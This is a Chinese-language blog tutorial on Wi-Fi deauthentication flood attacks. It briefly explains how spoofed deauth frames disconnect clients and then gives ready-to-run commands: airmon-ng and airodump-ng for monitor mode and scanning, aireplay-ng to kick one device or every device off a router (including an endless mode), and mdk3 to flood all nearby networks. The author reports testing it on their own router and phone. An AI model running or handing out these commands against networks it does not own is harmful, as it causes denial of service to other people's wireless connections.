Deauth Flood 攻击

简介:

Deauth Flood 攻击即为取消验证洪水攻击,它旨在通过欺骗从 AP 到客户端单播地址的取消身份验证帧来将客户端转为未关联 / 未认证的状态。对于目前的工具来说,这种形式的攻击在打断客户无线服务方面非常有效和快捷。一般来说,在攻击者发送另一个取消身份验证帧之前,客户端会重新关联和认证以再次获取服务。攻击者反复欺骗取消身份验证帧就能使所有客户端持续拒绝服务。

攻击步骤

1.探测周围的无线路由器以及连接到无线路由器上的设备

airmon-ng start wlan0  #开启无线网卡的监听模式
airodump-ng wlan0mon

在这里插入图片描述
2.使用aireplay进行攻击

指定特定的无线路由器上的特定设备进行Deauth Flood 攻击 10 是发送10次数据包如果是0的话就是一直发送数据包 -a 是路由器的mac -c 是连接在无线路由器上的设备的mac wlan0mon是无线网卡

aireplay-ng -0 10 -a 80:B0:7B:18:70:E0  -c FC:BE:7B:BE:35:E3 wlan0mon  

在这里插入图片描述

在这里插入图片描述

我测试的设备分别是我家的路由器和我的手机,从这里我们可以看到我的手机已经被踢下线了

2.攻击指定路由器上的全部设备

aireplay-ng -0 0 -a 80:B0:7B:18:70:E0 wlan0mon

在这里插入图片描述
3.使用mdk3进行全网攻击(效果一样)

mdk3 wlan0mon d

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值